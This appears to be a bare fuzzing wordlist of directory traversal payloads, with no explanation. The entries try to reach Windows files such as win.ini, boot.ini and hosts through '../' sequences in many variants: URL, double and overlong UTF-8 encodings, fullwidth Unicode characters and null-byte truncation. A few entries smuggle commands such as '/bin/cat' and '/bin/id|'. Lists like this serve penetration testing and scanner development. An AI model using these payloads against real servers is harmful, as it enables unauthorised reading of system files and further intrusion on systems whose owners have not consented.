./
../
\…..\\\…..\\\…..\\\
\\&apos;/bin/cat%20/win.ini\\&apos;
\\&apos;/bin/cat%20/boot.ini\\&apos;
\..\..\..\..\..\..\..\..\..\..\win.ini%00
\..\..\..\..\..\..\..\..\..\..\win.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini%00
\..\..\..\..\..\..\..\..\..\..\boot.ini
///////../../../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
/./././././././././././win.ini
/./././././././././././boot.ini
/..\..\\..\..\\..\..\\..\..\\\/win.ini
/..\..\\..\..\\..\..\\..\..\\\/boot.ini
/..\..\..\..\..\..\winnt\win.ini
/..\../..\../..\../..\../..\../..\../win.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/../../../../../../../../bin/id|
/../../../../../../../../../../win.ini^^
/../../../../../../../../../../win.ini
/../../../../../../../../../../boot.ini^^
/../../../../../../../../../../boot.ini
/../../../../../../../../../../../boot.ini%00.jpg
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini
/../../../../../../../../%2A
/.../.../.../.../.../
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../win.ini
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/win.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
.\\./.\\./.\\./.\\./.\\./.\\./win.ini
.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
..\..\..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\..\..\..\..\win.ini%00
..\..\..\..\..\..\..\..\..\..\win.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini
..\../..\../boot.ini
..\../..\../..\../..\../boot.ini
..2fboot.ini%00
..2fboot.ini
..2f..2fboot.ini%00
..2f..2fboot.ini
..2f..2f..2fboot.ini%00
..2f..2f..2fboot.ini
..2f..2f..2f..2fboot.ini%00
..2f..2f..2f..2fboot.ini
..2f..2f..2f..2f..2fboot.ini%00
..2f..2f..2f..2f..2fboot.ini
..2f..2f..2f..2f..2f..2fboot.ini%00
..2f..2f..2f..2f..2f..2fboot.ini
..2f..2f..2f..2f..2f..2f..2fboot.ini%00
..2f..2f..2f..2f..2f..2f..2fboot.ini
..2f..2f..2f..2f..2f..2f..2f..2fboot.ini%00
..2f..2f..2f..2f..2f..2f..2f..2fboot.ini
..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini%00
..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fboot.ini
../win.ini%00
../win.ini
../config.asp
../boot.ini%00
../boot.ini
..//..//..//..//..//boot.ini
../../windows/win.ini
../../win.ini%00
../../win.ini
../../boot.ini%00
../../boot.ini
../../../win.ini%00
../../../win.ini
../../../boot.ini%00
../../../boot.ini
../../../administrator/inbox
../../../../win.ini%00
../../../../win.ini
../../../../boot.ini%00
../../../../boot.ini
../../../../../win.ini%00
../../../../../win.ini
../../../../../boot.ini%00
../../../../../boot.ini
../../../../../../win.ini%00
../../../../../../win.ini
../../../../../../boot.ini&=%3C%3C%3C%3C
../../../../../../boot.ini%00
../../../../../../boot.ini
../../../../../../../win.ini%00
../../../../../../../win.ini
../../../../../../../boot.ini%00
../../../../../../../boot.ini
../../../../../../../../windows/win.ini
../../../../../../../../win.ini%00
../../../../../../../../win.ini
../../../../../../../../boot.ini%00
../../../../../../../../boot.ini
../../../../../../../../../win.ini%00
../../../../../../../../../win.ini
../../../../../../../../../boot.ini%00
../../../../../../../../../boot.ini
../../../../../../../../../../win.ini%00
../../../../../../../../../../win.ini
../../../../../../../../../../boot.ini%00
../../../../../../../../../../boot.ini
../../../../../../../../../../../win.ini%00
../../../../../../../../../../../win.ini
../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../boot.ini
../../../../../../../../../../../../win.ini%00
../../../../../../../../../../../../win.ini
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../hosts%00
../../../../../../../../../../../../hosts
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../win.ini%00
../../../../../../../../../../../../../win.ini
../../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../win.ini%00
../../../../../../../../../../../../../../win.ini
../../../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../../win.ini%00
../../../../../../../../../../../../../../../../win.ini
../../../../../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../../../../../../../../win.ini%00
../../../../../../../../../../../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../../../../../../../../../../../boot.ini
....\/boot.ini
....\/....\/boot.ini
....\/....\/....\/boot.ini
....\/....\/....\/....\/boot.ini
....\/....\/....\/....\/....\/boot.ini
....\/....\/....\/....\/....\/....\/boot.ini
....\/....\/....\/....\/....\/....\/....\/boot.ini
....\/....\/....\/....\/....\/....\/....\/....\/boot.ini
....\/....\/....\/....\/....\/....\/....\/....\/....\/boot.ini
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/boot.ini
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/boot.ini
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/boot.ini
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/boot.ini
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/boot.ini
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/boot.ini
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/boot.ini
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/boot.ini
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/boot.ini
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/boot.ini
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/boot.ini
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/boot.ini
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/boot.ini
....//boot.ini
....//....//boot.ini
....//....//....//boot.ini
....//....//....//....//boot.ini
....//....//....//....//....//boot.ini
....//....//....//....//....//....//boot.ini
....//....//....//....//....//....//....//boot.ini
....//....//....//....//....//....//....//....//boot.ini
....//....//....//....//....//....//....//....//....//boot.ini
....//....//....//....//....//....//....//....//....//....//boot.ini
....//....//....//....//....//....//....//....//....//....//....//boot.ini
....//....//....//....//....//....//....//....//....//....//....//....//boot.ini
....//....//....//....//....//....//....//....//....//....//....//....//....//boot.ini
....//....//....//....//....//....//....//....//....//....//....//....//....//....//boot.ini
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//boot.ini
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//boot.ini
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//boot.ini
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//boot.ini
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//boot.ini
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//boot.ini
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//boot.ini
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//boot.ini
..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bcboot.ini
..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8boot.ini
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
..%2F..%2F..%2F%2F..%2F..%2Fwin.ini
..%2F..%2F..%2F%2F..%2F..%2Fboot.ini
..%2F..%2F..%2F%2F..%2F..%2F%2Fboot.ini
%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%ef%bd%85%ef%bd%94%e2%85%bd%ef%bc%8f%ef%bd%90%ef%bd%81%ef%bd%93%ef%bd%93%ef%bd%97%e2%85%be
%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%ef%bd%82%ef%bd%8f%ef%bd%8f%ef%bd%94%e2%80%a4%e2%85%b0%ef%bd%8e%e2%85%b0
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwin.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%  25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%    25%5c..%25%5c..%255cboot.ini
%00../../../../../../win.ini
%00../../../../../../boot.ini